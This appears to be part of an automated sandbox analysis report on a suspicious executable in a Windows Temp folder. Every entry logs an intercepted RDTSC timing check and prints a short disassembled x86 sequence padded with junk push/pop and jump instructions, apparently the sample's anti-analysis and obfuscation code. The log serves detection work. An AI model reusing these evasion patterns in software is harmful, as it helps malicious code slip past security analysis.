Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8204E5 second address: 8204E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 820660 second address: 820676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8207E9 second address: 8207ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8207ED second address: 8207F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8207F6 second address: 820806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 jne 00007FAF7CBD5D36h 0x0000000c pop edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 820806 second address: 82080C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82080C second address: 820818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 820818 second address: 820835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FAF7C6A41B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7C9DFB second address: 7C9E04 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7C9E04 second address: 7C9E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 820C79 second address: 820C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81F4AF second address: 81F4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAF7C6A41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jo 00007FAF7C6A41A6h 0x00000014 jmp 00007FAF7C6A41B2h 0x00000019 je 00007FAF7C6A41A6h 0x0000001f popad 0x00000020 popad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81F4E2 second address: 81F4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 81F4E6 second address: 81F4EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 829C40 second address: 829C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E9D60 second address: 7E9D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7E9D66 second address: 7E9D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF7CBD5D46h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAF7CBD5D3Bh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA155 second address: 7EA199 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 1EF37087h 0x00000012 jmp 00007FAF7C6A41AFh 0x00000017 call 00007FAF7C6A41A9h 0x0000001c jo 00007FAF7C6A41B0h 0x00000022 jmp 00007FAF7C6A41AAh 0x00000027 push eax 0x00000028 jo 00007FAF7C6A41B0h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA199 second address: 7EA1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAF7CBD5D3Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA1B2 second address: 7EA1BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAF7C6A41A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA2E0 second address: 7EA2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA2E6 second address: 7EA2EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA2EA second address: 7EA307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAF7CBD5D41h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA307 second address: 7EA327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FAF7C6A41A6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA37F second address: 7EA383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA383 second address: 7EA387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA387 second address: 7EA3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jns 00007FAF7CBD5D44h 0x0000000e xchg eax, esi 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FAF7CBD5D38h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007FAF7CBD5D40h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FAF7CBD5D46h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA3F4 second address: 7EA3F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA3F8 second address: 7EA3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA526 second address: 7EA52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EADD2 second address: 7EAE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 ja 00007FAF7CBD5D43h 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2223h], esi 0x00000012 lea eax, dword ptr [ebp+1249088Eh] 0x00000018 jmp 00007FAF7CBD5D46h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007FAF7CBD5D3Ch 0x00000026 jng 00007FAF7CBD5D36h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EAE1C second address: 7EAE35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FAF7C6A41A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FAF7C6A41A8h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EAE35 second address: 7EAE84 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FAF7CBD5D38h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D3746h] 0x0000002b lea eax, dword ptr [ebp+1249084Ah] 0x00000031 mov cx, 27ACh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jc 00007FAF7CBD5D38h 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EAE84 second address: 7EAE89 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EAE89 second address: 7C9DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FAF7CBD5D40h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FAF7CBD5D38h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 jmp 00007FAF7CBD5D3Ah 0x0000002d call dword ptr [ebp+122D2522h] 0x00000033 pushad 0x00000034 js 00007FAF7CBD5D42h 0x0000003a jng 00007FAF7CBD5D36h 0x00000040 jnp 00007FAF7CBD5D36h 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FAF7CBD5D45h 0x0000004d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82909A second address: 8290B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8290B7 second address: 8290BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8290BD second address: 8290C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8290C3 second address: 8290C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 829261 second address: 829275 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF7C6A41A8h 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FAF7C6A41AEh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8293D9 second address: 8293DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 829538 second address: 82953E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82F07E second address: 82F082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82F082 second address: 82F086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82F086 second address: 82F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007FAF7CBD5D46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82F0AD second address: 82F0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82F3B3 second address: 82F3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 82F3B7 second address: 82F3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 838947 second address: 83894B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83725F second address: 837265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83751A second address: 837538 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAF7CBD5D3Ch 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837829 second address: 83784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAF7C6A41A6h 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FAF7C6A41B5h 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83784E second address: 837866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D42h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 7EA7E9 second address: 7EA7EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837B15 second address: 837B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAF7CBD5D36h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837B1F second address: 837B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF7C6A41B4h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007FAF7C6A41CCh 0x00000013 jo 00007FAF7C6A41B2h 0x00000019 jc 00007FAF7C6A41A6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837B4F second address: 837B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007FAF7CBD5D36h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837B5D second address: 837B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837CBB second address: 837CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837CBF second address: 837CE9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF7C6A41A6h 0x00000008 jmp 00007FAF7C6A41B2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jne 00007FAF7C6A41A6h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837CE9 second address: 837D19 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAF7CBD5D3Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FAF7CBD5D36h 0x00000010 push ecx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAF7CBD5D47h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 837D19 second address: 837D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83AE81 second address: 83AE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAF7CBD5D36h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83AE91 second address: 83AE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83AFCF second address: 83AFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAF7CBD5D36h 0x0000000a pop ecx 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAF7CBD5D43h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83AFF5 second address: 83AFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83B45E second address: 83B464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83B464 second address: 83B46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83B46A second address: 83B477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83B477 second address: 83B487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41ACh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83B487 second address: 83B4BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAF7CBD5D36h 0x00000008 jmp 00007FAF7CBD5D3Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAF7CBD5D49h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83B4BE second address: 83B4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83B4C3 second address: 83B4C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83E85F second address: 83E868 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83EDAD second address: 83EDB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83EEEC second address: 83EF0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FAF7C6A41B0h 0x0000000f push esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83F07F second address: 83F09F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FAF7CBD5D36h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 83F09F second address: 83F0C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7C6A41A6h 0x00000008 jmp 00007FAF7C6A41B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8465F6 second address: 846605 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844732 second address: 844736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844736 second address: 844744 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844744 second address: 844748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844BE4 second address: 844BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
